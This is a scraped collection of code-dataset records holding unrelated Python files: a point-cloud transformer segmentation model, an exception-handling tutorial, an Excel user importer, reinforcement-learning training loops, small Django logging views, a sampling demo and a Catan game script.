3]\n Return:\n group_idx: grouped points index, [B, S, nsample]\n \"\"\"\n device = xyz.device\n B, N, C = xyz.shape\n _, S, _ = new_xyz.shape\n group_idx = torch.arange(N, dtype=torch.long).to(device).view(1, 1, N).repeat([B, S, 1])\n sqrdists = square_distance(new_xyz, xyz)\n group_idx[sqrdists > radius ** 2] = N\n group_idx = group_idx.sort(dim=-1)[0][:, :, :nsample]\n group_first = group_idx[:, :, 0].view(B, S, 1).repeat([1, 1, nsample])\n mask = group_idx == N\n group_idx[mask] = group_first[mask]\n return group_idx\n\n\ndef knn_point(nsample, xyz, new_xyz):\n \"\"\"\n Input:\n nsample: max sample number in local region\n xyz: all points, [B, N, C]\n new_xyz: query points, [B, S, C]\n Return:\n group_idx: grouped points index, [B, S, nsample]\n \"\"\"\n sqrdists = square_distance(new_xyz, xyz)\n _, group_idx = torch.topk(sqrdists, nsample, dim=-1, largest=False, sorted=False)\n return group_idx\n\n\nclass LocalGrouper(nn.Module):\n def __init__(self, groups, kneighbors, **kwargs):\n \"\"\"\n Give xyz[b,p,3] and fea[b,p,d], return new_xyz[b,g,3] and new_fea[b,g,k,2d]\n :param groups: groups number\n :param kneighbors: k-nerighbors\n :param kwargs: 
others\n \"\"\"\n super(LocalGrouper, self).__init__()\n self.groups = groups\n self.kneighbors = kneighbors\n\n def forward(self, xyz, points):\n B, N, C = xyz.shape\n S = self.groups\n xyz = xyz.contiguous() # xyz [btach, points, xyz]\n\n # fps_idx = farthest_point_sample(xyz, self.groups).long()\n fps_idx = pointnet2_utils.furthest_point_sample(xyz, self.groups).long() # [B, npoint]\n new_xyz = index_points(xyz, fps_idx)\n new_points = index_points(points, fps_idx)\n\n idx = knn_point(self.kneighbors, xyz, new_xyz)\n # idx = query_ball_point(radius, nsample, xyz, new_xyz)\n # grouped_xyz = index_points(xyz, idx) # [B, npoint, nsample, C]\n grouped_points = index_points(points, idx)\n grouped_points_norm = grouped_points - new_points.view(B, S, 1, -1)\n new_points = torch.cat([grouped_points_norm,\n new_points.view(B, S, 1, -1).repeat(1, 1, self.kneighbors, 1)]\n , dim=-1)\n return new_xyz, new_points\n\n\nclass FCBNReLU1D(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1, bias=False):\n super(FCBNReLU1D, self).__init__()\n self.net = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, bias=bias),\n nn.BatchNorm1d(out_channels),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nclass FCBNReLU1DRes(nn.Module):\n def __init__(self, channel, kernel_size=1, bias=False):\n super(FCBNReLU1DRes, self).__init__()\n self.net = nn.Sequential(\n nn.Conv1d(in_channels=channel, out_channels=channel, kernel_size=kernel_size, bias=bias),\n nn.BatchNorm1d(channel),\n nn.ReLU(inplace=True),\n nn.Conv1d(in_channels=channel, out_channels=channel, kernel_size=kernel_size, bias=bias),\n nn.BatchNorm1d(channel)\n )\n\n def forward(self, x):\n return F.relu(self.net(x)+x, inplace=True)\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads = 8, dim_head = 32, dropout = 0.):\n super().__init__()\n inner_dim = dim_head * heads\n # project_out = not (heads == 1 and dim_head == dim)\n self.heads = heads\n self.scale = dim_head ** -0.5\n\n self.attend = nn.Softmax(dim = -1)\n self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)\n\n self.to_out = nn.Sequential(\n nn.Conv1d(inner_dim, dim,1),\n nn.BatchNorm1d(dim)\n )\n\n def forward(self, x):\n x = x.permute(0,2,1)\n b, n, _, h = *x.shape, self.heads\n qkv = self.to_qkv(x).chunk(3, dim = -1)\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale\n\n attn = self.attend(dots)\n\n out = einsum('b h i j, b h j d -> b h i d', attn, v)\n out = rearrange(out, 'b h n d -> b (h d) n')\n\n return self.to_out(out)\n\n\nclass TransformerBlock(nn.Module):\n def __init__(self, dim, heads=8, dim_head=32, **kwargs):\n \"\"\"\n [b batch, d dimension, k points]\n :param dim: input data dimension\n :param heads: heads number\n :param dim_head: dimension in each head\n :param kwargs:\n \"\"\"\n super(TransformerBlock, self).__init__()\n self.attention = Attention(dim=dim, heads=heads, dim_head=dim_head)\n self.ffn = nn.Sequential(\n nn.Conv1d(dim, dim, 1, bias=False),\n nn.BatchNorm1d(dim)\n )\n\n\n def forward(self, x):\n \"\"\"\n :input x: [b batch, d dimension, p points,]\n :return: [b batch, d dimension, p points,]\n \"\"\"\n att = self.attention(x)\n att = F.relu(att+x, inplace=True)\n out = self.ffn(att)\n out = F.relu(att+out, inplace=True)\n return out\n\n\nclass PreExtraction(nn.Module):\n def __init__(self, channels, blocks=1):\n \"\"\"\n input: [b,g,k,d]: 
output:[b,d,g]\n :param channels:\n :param blocks:\n \"\"\"\n super(PreExtraction, self).__init__()\n operation = []\n for _ in range(blocks):\n operation.append(\n FCBNReLU1DRes(channels)\n )\n self.operation = nn.Sequential(*operation)\n self.transformer = TransformerBlock(channels, heads=4)\n def forward(self, x):\n b, n, s, d = x.size() # torch.Size([32, 512, 32, 6])\n x = x.permute(0, 1, 3, 2)\n x = x.reshape(-1, d, s)\n batch_size, _, N = x.size()\n x = self.operation(x) # [b, d, k]\n x = self.transformer(x)\n x = F.adaptive_max_pool1d(x, 1).view(batch_size, -1)\n x = x.reshape(b, n, -1).permute(0, 2, 1)\n return x\n\n\nclass PosExtraction(nn.Module):\n def __init__(self, channels, blocks=1):\n \"\"\"\n input[b,d,g]; output[b,d,g]\n :param channels:\n :param blocks:\n \"\"\"\n super(PosExtraction, self).__init__()\n operation = []\n for _ in range(blocks):\n operation.append(\n FCBNReLU1DRes(channels)\n )\n self.operation = nn.Sequential(*operation)\n self.transformer = TransformerBlock(channels, heads=4)\n\n def forward(self, x): # [b, d, k]\n return self.transformer(self.operation(x))\n\n\nclass encoder_stage(nn.Module):\n def __init__(self, anchor_points=1024, channel=64,\n pre_blocks=2, pos_blocks=2, k_neighbor=32, reduce=False, **kwargs):\n super(encoder_stage, self).__init__()\n out_channel = channel * 2\n # append local_grouper_list\n self.reduce = reduce\n if self.reduce:\n self.reducer = nn.Sequential(\n nn.Linear(out_channel, channel),\n nn.ReLU(inplace=True)\n )\n out_channel = channel\n self.local_grouper = LocalGrouper(anchor_points, k_neighbor) # [b,g,k,d]\n # append pre_block_list\n self.pre_block_module = PreExtraction(out_channel, pre_blocks)\n # append pos_block_list\n self.pos_block_module = PosExtraction(out_channel, pos_blocks)\n\n def forward(self, xyz, x):\n xyz, x = self.local_grouper(xyz, x.permute(0, 2, 1)) # [b,g,3] [b,g,k,d]\n if hasattr(self,\"reducer\"):\n x = self.reducer(x)\n x = self.pre_block_module(x) # [b,d,g]\n x = self.pos_block_module(x) # [b,d,g]\n return xyz, x\n\nclass PointNetFeaturePropagation(nn.Module):\n def __init__(self, in_channel, mlp):\n super(PointNetFeaturePropagation, self).__init__()\n self.mlp_convs = nn.ModuleList()\n self.mlp_bns = nn.ModuleList()\n last_channel = in_channel\n for out_channel in mlp:\n self.mlp_convs.append(nn.Conv1d(last_channel, out_channel, 1))\n self.mlp_bns.append(nn.BatchNorm1d(out_channel))\n last_channel = out_channel\n\n def forward(self, xyz1, xyz2, points1, points2):\n \"\"\"\n Input:\n xyz1: input points position data, [B, C, N]\n xyz2: sampled input points position data, [B, C, S]\n points1: input points data, [B, D, N]\n points2: input points data, [B, D, S]\n Return:\n new_points: upsampled points data, [B, D', N]\n \"\"\"\n # xyz1 = xyz1.permute(0, 2, 1)\n # xyz2 = xyz2.permute(0, 2, 1)\n\n points2 = points2.permute(0, 2, 1)\n B, N, C = xyz1.shape\n _, S, _ = xyz2.shape\n\n if S == 1:\n interpolated_points = points2.repeat(1, N, 1)\n else:\n dists = square_distance(xyz1, xyz2)\n dists, idx = dists.sort(dim=-1)\n dists, idx = dists[:, :, :3], idx[:, :, :3] # [B, N, 3]\n\n dist_recip = 1.0 / (dists + 1e-8)\n norm = torch.sum(dist_recip, dim=2, keepdim=True)\n weight = dist_recip / norm\n interpolated_points = torch.sum(index_points(points2, idx) * weight.view(B, N, 3, 1), dim=2)\n\n if points1 is not None:\n points1 = points1.permute(0, 2, 1)\n new_points = torch.cat([points1, interpolated_points], dim=-1)\n else:\n new_points = interpolated_points\n\n new_points = new_points.permute(0, 2, 1)\n 
for i, conv in enumerate(self.mlp_convs):\n bn = self.mlp_bns[i]\n new_points = F.relu(bn(conv(new_points)),inplace=True)\n return new_points\n\n\n\n\nclass get_model(nn.Module):\n def __init__(self, num_classes=50,points=2048, embed_dim=128, normal_channel=True,\n pre_blocks=[2,2,2,2], pos_blocks=[2,2,2,2], k_neighbors=[32,32,32,32],\n reducers=[2,2,2,2], **kwargs):\n super(get_model, self).__init__()\n # self.stages = len(pre_blocks)\n self.num_classes = num_classes\n self.points=points\n input_channel=6 if normal_channel else 3\n self.embedding = nn.Sequential(\n FCBNReLU1D(input_channel, embed_dim),\n FCBNReLU1D(embed_dim, embed_dim)\n )\n\n self.encoder_stage1 = encoder_stage(anchor_points=points//4, channel=128, reduce=False,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n self.encoder_stage2 = encoder_stage(anchor_points=points//8, channel=256, reduce=True,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n self.encoder_stage3 = encoder_stage(anchor_points=points // 16, channel=256, reduce=False,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n self.encoder_stage4 = encoder_stage(anchor_points=points // 32, channel=512, reduce=True,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n\n self.fp4 = PointNetFeaturePropagation(in_channel=(512+512), mlp=[512,256,256])\n self.fp3 = PointNetFeaturePropagation(in_channel=256+256, mlp=[512, 256, 256])\n self.fp2 = PointNetFeaturePropagation(in_channel=256 + 256, mlp=[256, 256])\n self.fp1 = PointNetFeaturePropagation(in_channel=256+128+128, mlp=[256, 256])\n\n self.info_encoder = nn.Sequential(\n FCBNReLU1D(16+3+input_channel, 128),\n FCBNReLU1D(128, 128),\n )\n self.global_encoder = nn.Sequential(\n FCBNReLU1D(512, 256),\n FCBNReLU1D(256, 128),\n )\n\n self.conv0 = nn.Conv1d(256, 256, 1)\n self.bn0 = nn.BatchNorm1d(256)\n self.drop0 = nn.Dropout(0.4)\n self.conv1 = nn.Conv1d(256, 128, 1)\n self.bn1 = nn.BatchNorm1d(128)\n self.drop1 = nn.Dropout(0.4)\n self.conv2 = nn.Conv1d(128, num_classes, 1)\n\n def forward(self, x, cls_label):\n points_0 = x\n B, C, N = x.shape\n xyz = x.permute(0, 2, 1)[:,:,:3]\n batch_size, _, _ = x.size()\n x = self.embedding(x) # B,D,N\n xyz_1, fea_1 = self.encoder_stage1(xyz, x) # [b,p1,3] [b,d1,p1]\n xyz_2, fea_2 = self.encoder_stage2(xyz_1, fea_1) # [b,p2,3] [b,d2,p2]\n xyz_3, fea_3 = self.encoder_stage3(xyz_2, fea_2) # [b,p3,3] [b,d3,p3]\n xyz_4, fea_4 = self.encoder_stage4(xyz_3, fea_3) # [b,p4,3] [b,d4,p3]\n global_context = F.adaptive_max_pool1d(fea_4, 1)\n\n l3_points = self.fp4(xyz_3, xyz_4, fea_3, fea_4)\n l2_points = self.fp3(xyz_2, xyz_3, fea_2, l3_points)\n l1_points = self.fp2(xyz_1, xyz_2, fea_1, l2_points)\n cls_label_one_hot = cls_label.view(B, 16, 1).repeat(1, 1, N)\n extra_info = torch.cat([cls_label_one_hot, xyz.permute(0, 2, 1), points_0], 1)\n extra_info = self.info_encoder(extra_info)\n global_context = self.global_encoder(global_context)\n l0_points = self.fp1(xyz, xyz_1, torch.cat([extra_info,global_context.expand_as(extra_info) ], 1), l1_points)\n\n # FC layers\n feat = F.relu(self.bn0(self.conv0(l0_points)), inplace=True)\n feat = self.drop0(feat)\n feat = F.relu(self.bn1(self.conv1(feat)),inplace=True)\n x = self.drop1(feat)\n x = self.conv2(x)\n x = F.log_softmax(x, dim=1)\n x = x.permute(0, 2, 1)\n return x, xyz_3.permute(0, 2, 1)\n\n\n\n\nclass get_loss(nn.Module):\n def __init__(self):\n super(get_loss, self).__init__()\n\n def forward(self, pred, target, trans_feat):\n total_loss = F.nll_loss(pred, target)\n\n return total_loss\n\nif __name__ == '__main__':\n data = torch.rand(2,128,10)\n att = 
Attention(128)\n out = att(data)\n print(out.shape)\n\n\n\n batch, groups,neighbors,dim=2,512,32,16\n x = torch.rand(batch,groups,neighbors,dim)\n pre_extractor = PreExtraction(dim,3)\n out = pre_extractor(x)\n print(out.shape)\n\n x = torch.rand(batch, dim, groups)\n pos_extractor = PosExtraction(dim, 3)\n out = pos_extractor(x)\n print(out.shape)\n\n\n data = torch.rand(2, 6, 1024)\n cls_label = torch.rand([2, 16])\n print(\"===> testing model ...\")\n model = get_model(points=1024)\n out,_ = model(data, cls_label)\n print(out.shape)\n","sub_path":"part_segmentation/models/pointsformerE.py","file_name":"pointsformerE.py","file_ext":"py","file_size_in_byte":16860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"507229300","text":"\"\"\"\r\nPoints to remember:\r\n1. syntax:\r\ntry:\r\n pass\r\nexcept (RuntimeError, TypeError, NameError):\r\n pass\r\nexcept ZeroDivisionError as e:\r\n print (e)\r\nexcept NameError:\r\n pass\r\nexcept:\r\n pass\r\nelse:\r\n pass\r\nfinally:\r\n pass\r\n\r\nNote: 1. try-else is not possible\r\n 2. It should follow this order try->except->else->finally.\r\n 3. default except must be last except statement(only except without exception)\r\n 4. It can have multiple except statement but only one except statement executed.\r\n 5. Each except clause can have multiple exceptions\r\n 6. It can have duplicate except clause but there is no use of duplicate clause\r\n 7. the except block of code executed when try block throws any exception.\r\n 7. The else block of code is executed only when there no exception occurs in try block.(When try block does not raise any exception).\r\n 8. The finally block of code always executed whether we got exception or not.\r\n 9. Exception() takes no keyword arguments.(Pass only positional argument)\r\n\"\"\"\r\n\r\ntry :\r\n a = int(input(\"enter any no :\"))\r\n b = 12\r\n c = b / a\r\n print (c)\r\nexcept ZeroDivisionError as x:\r\n print (x)\r\nelse :\r\n print(\"else part\")\r\nfinally :\r\n print (\"finally part\") \r\n \r\n\r\nimport sys\r\ntry:\r\n f = open('myfile.txt')\r\n s = f.readline()\r\n i = int(s.strip())\r\nexcept OSError as err:\r\n print(\"OS error: {0}\".format(err))\r\nexcept ValueError:\r\n print(\"Could not convert data to an integer.\")\r\nexcept:\r\n print(\"Unexpected error:\", sys.exc_info()[0])\r\n raise\r\n \r\n \r\n\r\n## Manually raising an exception: raise IntanceOfBaseException(). It must be either a subclass or an instance of BaseException\r\ndef functionName( level ):\r\n if level <1:\r\n raise Exception(\"Invalid Level\",level) # Exception() takes no keyword arguments.(Pass only positional argument)\r\n return level\r\n\r\ntry:\r\n l = functionName(-10)\r\n print (\"level = \",l)\r\nexcept Exception as e:\r\n print (\"error in level argument\",e.args[0],e.args[1]) # error in level argument Invalid Level -10\r\n print(e) # ('Invalid Level', -10)\r\n print(type(e)) #
\r\n\r\n\r\n \r\n## User-defined Exceptions: Exceptions should typically be derived from the Exception class, either directly or indirectly.\r\nclass MultiplyByZeroError(Exception): # Note: user defined exceptions must derive from BaseException\r\n def __init__(self, *args):\r\n self.args = args\r\n # super().__init__(*args)\r\n\r\n def __str__(self):\r\n return str(self.args)\r\ntry:\r\n if 5 * 0 == 0:\r\n raise MultiplyByZeroError(\"Bad hostname\", 5)\r\nexcept MultiplyByZeroError as e:\r\n print(e) # ('Bad hostname', 5)\r\n print(type(e)) # \r\n\r\n \r\n\r\n## creating base exception for all errors:\r\nclass Error(Exception):\r\n \"\"\"Base class for exceptions in this module.\"\"\"\r\n pass\r\n\r\nclass InputError(Error):\r\n \"\"\"Exception raised for errors in the input.\r\n\r\n Attributes:\r\n expression -- input expression in which the error occurred\r\n message -- explanation of the error\r\n \"\"\"\r\n\r\n def __init__(self, expression, message):\r\n self.expression = expression\r\n self.message = message\r\n\r\nclass TransitionError(Error):\r\n \"\"\"Raised when an operation attempts a state transition that's not\r\n allowed.\r\n\r\n Attributes:\r\n previous -- state at beginning of transition\r\n next -- attempted new state\r\n message -- explanation of why the specific transition is not allowed\r\n \"\"\"\r\n\r\n def __init__(self, previous, next, message):\r\n self.previous = previous\r\n self.next = next\r\n self.message = message\r\n \r\n\r\n#Defining Clean-up Actions: \r\n\"\"\"\r\nA finally clause is always executed before leaving the try statement, whether an exception has occurred or not. When an exception \r\nhas occurred in the try clause and has not been handled by an except clause (or it has occurred in an except or else clause), it \r\nis re-raised after the finally clause has been executed. The finally clause is also executed “on the way out” when any other clause\r\nof the try statement is left via a break, continue or return statement. A more complicated example:\r\n\"\"\"\r\n\r\ndef divide(x, y):\r\n try:\r\n result = x / y\r\n except ZeroDivisionError:\r\n print(\"division by zero!\")\r\n else:\r\n print(\"result is\", result)\r\n raise Exception(\"Re-raise exception\")\r\n finally:\r\n print(\"executing finally clause\")\r\n\r\ndivide(2, 1)\r\n\"\"\"\r\nresult is 2.0\r\n\r\nTraceback (most recent call last):\r\nexecuting finally clause\r\n\r\n File \"C:/Users/Test/test.py\", line 12, in \r\n divide(2, 1)\r\n File \"C:/Users/Test/test.py\", line 8, in divide\r\n raise Exception(\"Re-raise exception\")\r\n\r\nException: Re-raise exception\r\nProcess finished with exit code 1\r\n\"\"\"\r\ndivide(2, 0)\r\ndivide(\"2\", \"1\")\r\n","sub_path":"Project-Python/exception/exceptionHandlingEx.py","file_name":"exceptionHandlingEx.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
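# Illustrative addition (not part of the original file): a minimal sketch of the
# "finally runs on the way out" rule quoted in the docstring above. A return inside
# finally even overrides the value returned from try (and swallows pending
# exceptions) -- one reason to avoid return inside finally.
def f():
    try:
        return "from try"
    finally:
        print("finally runs before leaving f()")

def g():
    try:
        return "from try"
    finally:
        return "from finally"   # replaces the try return and suppresses exceptions

assert f() == "from try"
assert g() == "from finally"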
+{"seq_id":"229691064","text":"# -*- coding:utf8 -*-\n\n\n\"\"\"\n将 excel 文件导入到数据库表中\n\"\"\"\n\n\nimport xlrd\n\n\nclass FakeUser(object):\n\n def __init__(self, name, gender, avatar, location, follower, fans, weibo, intro, tag, education, career, open_id):\n self.name = name\n self.gender = gender\n self.avatar = avatar\n self.location = location\n self.follower = follower\n self.fans = fans\n self.weibo = weibo\n self.intro = intro\n self.tag = tag\n self.education = education\n self.career = career\n\n # fake 一个 openid 给 user\n self.open_id = open_id\n\n def __str__(self):\n return '%s: %s-%s-%s' % (self.open_id, self.name, self.gender, self.location)\n\n\ndef read_excel(excel_path='/root/workspace/excel/users.xlsx'):\n \"\"\"\n 读 excel 文件\n 注意: 到时候写入 fake user 的时候, 在 BaseUserInfo 的 extra_info 里面记录下这是个 fake 的 user --> 先检查下有没有执行过\n :param excel_path:\n :return:\n \"\"\"\n fake_users = []\n\n excel_object = xlrd.open_workbook(excel_path)\n table = excel_object.sheets()[0]\n\n nrows = table.nrows # 行数\n ncole = table.ncols # 列数\n\n fake_open_id = 1\n\n for i in range(1, nrows):\n row_values = table.row_values(i)\n fake_users.append(\n FakeUser(row_values[0], row_values[1], row_values[2], row_values[3], row_values[4], row_values[5],\n row_values[6], row_values[7], row_values[8], row_values[9], row_values[10], fake_open_id)\n )\n fake_open_id += 1\n\n print(\"user count: \", len(fake_users))\n return fake_users\n","sub_path":"commercial/util/excel_import.py","file_name":"excel_import.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"386558366","text":"from unityagents import UnityEnvironment\r\nimport numpy as np\r\nfrom ddpg_agent import Agent\r\nimport random\r\nimport torch\r\nfrom collections import deque\r\nimport matplotlib.pyplot as plt\r\n\r\nenv = UnityEnvironment(file_name=\"Tennis.exe\")\r\nbrain_name = env.brain_names[0]\r\nbrain = env.brains[brain_name]\r\nenv_info = env.reset(train_mode=True)[brain_name]\r\nnum_agents = len(env_info.agents)\r\nprint('Number of agents:', num_agents)\r\naction_size = brain.vector_action_space_size\r\nprint('Size of each action:', action_size)\r\nstates = env_info.vector_observations\r\nstate_size = states.shape[1]\r\nprint('There are {} agents. Each observes a state with length: {}'.format(states.shape[0], state_size))\r\nprint('The state for the first agent looks like:', states[0])\r\n\r\ndef ddpg(n_episodes=50000, max_t=3000):\r\n scores = []\r\n scores_window = deque(maxlen=100)\r\n for i_episode in range(1, n_episodes+1):\r\n env_info = env.reset(train_mode=True)[brain_name]\r\n states = env_info.vector_observations\r\n agent.reset()\r\n episode_score = np.zeros(num_agents)\r\n t=0\r\n while True:\r\n t+=1\r\n action=agent.act(states)\r\n env_info=env.step(action)[brain_name]\r\n next_state = env_info.vector_observations\r\n reward=env_info.rewards\r\n done=env_info.local_done\r\n agent.step(states[0], action[0], reward[0], next_state[0], done[0],t)\r\n agent.step(states[1], action[1], reward[1], next_state[1], done[1],t)\r\n states=next_state\r\n episode_score += reward\r\n if np.any(done):\r\n break\r\n max_score=np.max(episode_score)\r\n scores_window.append(max_score)\r\n scores.append(max_score)\r\n print('\\rEpisode {}\\tAvg. score: {:.2f}\\t'.format(i_episode, np.mean(scores_window), end=\"\"))\r\n if i_episode % 100 == 0:\r\n print('\\rEpisode {}\\tAvg. score: {:.2f}'.format(i_episode, np.mean(scores_window)))\r\n if np.mean(scores_window)>=0.5:\r\n print('\\nSolved in {:d} episodes.\\tAvg score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\r\n torch.save(agent.actor_local.state_dict(), 'checkpoint_actor.pth')\r\n torch.save(agent.critic_local.state_dict(), 'checkpoint_critic.pth')\r\n break\r\n return scores\r\n\r\nagent = Agent(state_size=state_size, action_size=action_size, random_seed=1)\r\nhistorized_scores = ddpg()\r\n\r\n# plot results:\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nplt.plot(np.arange(1, len(historized_scores)+1), historized_scores)\r\nplt.ylabel('Score')\r\nplt.xlabel('Episode #')\r\nplt.show()\r\nenv.close()","sub_path":"Tennis.py","file_name":"Tennis.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"625237814","text":"from django.http import HttpResponse\nfrom flashcounter.game2010.models import Log, Result\nfrom datetime import datetime\nfrom django.db import connection\n\ndef event(request):\n event = Log(event=request.POST['event'], ctime=datetime.now())\t\n event.save()\n return HttpResponse(\"registred as #%s\" % event.id)\n\ndef result(request):\n result = Result(name=request.POST['name'], value=request.POST['value'], ctime=datetime.now())\t\n result.save()\n return HttpResponse(\"registred as #%s\" % result.id)\n\ndef daystat(request):\n cursor = connection.cursor()\n cursor.execute(\"select extract(year from ctime) as y, extract (month from ctime) as m, extract (day from ctime) as d, extract(hour from ctime) as h, event, count(*) from game2010_log where ctime > now() - interval '1 day' group by y, m, d, h, event order by y, m, d, h, event\")\n\n r = ''\n r+= ' Flashcounter - Last day statistics '\n r+= ' '\n r+= ' '\n r+= ' Date Hour of day Event count \\n'\n row = cursor.fetchone()\n while (row):\n r+= ' %s-%s-%s %s %s %s \\n' % (int(row[0]),int(row[1]),int(row[2]),int(row[3]), row[4], row[5])\n row = cursor.fetchone()\n r+= '
'\n r+= ' '\n r+= ''\n return HttpResponse(r)\n\n","sub_path":"flashcounter/game2010/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"202622374","text":"import time\nimport tqdm\nimport numpy as np\nimport collections\nfrom torch.utils.tensorboard import SummaryWriter\nfrom typing import Dict, List, Union, Callable, Optional\n\nfrom tianshou.data import Collector\nfrom tianshou.policy import BasePolicy\nfrom tianshou.utils import tqdm_config, MovAvg\nfrom tianshou.trainer import test_episode, gather_info\n\n\ndef offpolicy_trainer(\n policy: BasePolicy,\n train_collector,\n max_epoch: int,\n step_per_epoch: int,\n collect_per_step: int,\n batch_size: int,\n update_per_step: int = 1,\n train_fn: Optional[Callable[[int], None]] = None,\n writer: Optional[SummaryWriter] = None,\n log_interval: int = 1000,\n) -> int:\n \"\"\"A wrapper for off-policy trainer procedure. The ``step`` in trainer\n means a policy network update.\n\n :param policy: an instance of the :class:`~tianshou.policy.BasePolicy`\n class.\n :param train_collector: the collector used for training.\n :type train_collector: :class:`~tianshou.data.Collector`\n :param test_collector: the collector used for testing.\n :type test_collector: :class:`~tianshou.data.Collector`\n :param int max_epoch: the maximum of epochs for training. The training\n process might be finished before reaching the ``max_epoch``.\n :param int step_per_epoch: the number of step for updating policy network\n in one epoch.\n :param int collect_per_step: the number of frames the collector would\n collect before the network update. In other words, collect some frames\n and do some policy network update.\n :param episode_per_test: the number of episodes for one policy evaluation.\n :param int batch_size: the batch size of sample data, which is going to\n feed in the policy network.\n :param int update_per_step: the number of times the policy network would\n be updated after frames are collected, for example, set it to 256 means\n it updates policy 256 times once after ``collect_per_step`` frames are\n collected.\n :param function train_fn: a function receives the current number of epoch\n index and performs some operations at the beginning of training in this\n epoch.\n :param torch.utils.tensorboard.SummaryWriter writer: a TensorBoard\n SummaryWriter.\n :param int log_interval: the log interval of the writer.\n\n :return: See :func:`~tianshou.trainer.gather_info`.\n \"\"\"\n global_step = 0\n best_epoch, best_reward = -1, -1.\n stat = {}\n start_time = time.time()\n for epoch in range(1, 1 + max_epoch):\n # train\n policy.train()\n if train_fn:\n train_fn(epoch)\n with tqdm.tqdm(total=step_per_epoch, desc=f'Epoch #{epoch}',\n **tqdm_config) as t:\n results = collections.deque(maxlen=100)\n while t.n < t.total:\n assert train_collector.policy == policy\n result = train_collector.collect(n_step=collect_per_step)\n results.extend([result])\n data = {}\n for i in range(update_per_step * min(\n min(100, result['n/st']) // collect_per_step, t.total - t.n)):\n losses = policy.update(batch_size, train_collector.buffer)\n global_step += collect_per_step\n for k in result.keys():\n data[k] = f'{result[k]:.2f}'\n if writer and global_step % log_interval == 0:\n writer.add_scalar('train/' + k, np.mean([r[k] for r in results]),\n global_step=global_step)\n for k in losses.keys():\n if stat.get(k) is None:\n stat[k] = MovAvg()\n stat[k].add(losses[k])\n data[k] = f'{stat[k].get():.6f}'\n if writer and global_step % log_interval == 0:\n writer.add_scalar(\n k, stat[k].get(), global_step=global_step)\n data['exp_noise'] = policy._noise._sigma\n t.update(1)\n t.set_postfix(**data)\n if t.n <= 
t.total:\n t.update()\n return global_step\n","sub_path":"continuous/offpolicy.py","file_name":"offpolicy.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"651263091","text":"import numpy as np\nfrom scipy.stats import norm\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport elice_utils\n\ndef read_input():\n\tm, s = [int(x) for x in input().split()]\n\treturn m, s\n\ndef generate_samples(m, s):\n\treturn np.random.normal(m, s, 1000)\n\ndef plotting(samples, m, s):\n\tcount, bins, ignored = plt.hist(samples, 30, normed=True)\n\tplt.plot(bins, norm.pdf(bins, m, s), linewidth=2, color='r')\n\tplt.xlabel(\"X\", fontsize=20)\n\tplt.ylabel(\"P(X)\", fontsize=20)\n\tplt.xlim(0, 100)\n\tplt.savefig(\"normal_samples.png\")\n\telice_utils.send_image(\"normal_samples.png\")\n\tplt.close()\n\n\treturn\n\ndef main():\n\tm, s = read_input()\n\tsamples = generate_samples(m, s)\n\tplotting(samples, m, s)\n\treturn\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"6. 데모/[3주차] Unsupervised Learning/단변량 정규분포에서 표본 추출/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"91095560","text":"# imports neccessary modules\nfrom .catan_game import CatanGame\nfrom .catan_statuses import CatanStatuses\n\n# creates a new game of Catan\ngame = CatanGame()\n\n# Do for each player twice:\nfor i in range(2 * len(game.players)):\n\n # saves the player's number as p\n p = i % 3\n\n has_error = True\n while (has_error):\n\n # ask them to build a settlement\n print((\"Player %s, where do you want to build your first settlement?\" % (p + 1)))\n r = int(eval(input(\"Enter the row:\")))\n i = int(eval(input(\"Enter the index: \")))\n \n # try to place the settlement\n status = game.add_settlement(player=p, r=r, i=i, is_starting=True)\n \n \t# if it didn't work, tell them why and try again\n if status != CatanStatuses.ALL_GOOD:\n \n # figure out what went wrong\n if status == CatanStatuses.ERR_BLOCKED:\n print(\"That settlement position is to close to another settlement\")\n \n elif status == CatanStatuses.ERR_BAD_POINT:\n print(\"That settlement position doesn't exist!\")\n \t\t\t\n else:\n print((\"An unexpected error occured: %s\" % status))\n \n else:\n print(\"Successfully built a settlement\")\n has_error = False\n \n \n # get all the possible places a road could go from their settlement\n \n # get them to choose one\n \n # try to build the road\n \n # if it didn't work, try again","sub_path":"PyCatan/catan.py","file_name":"catan.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
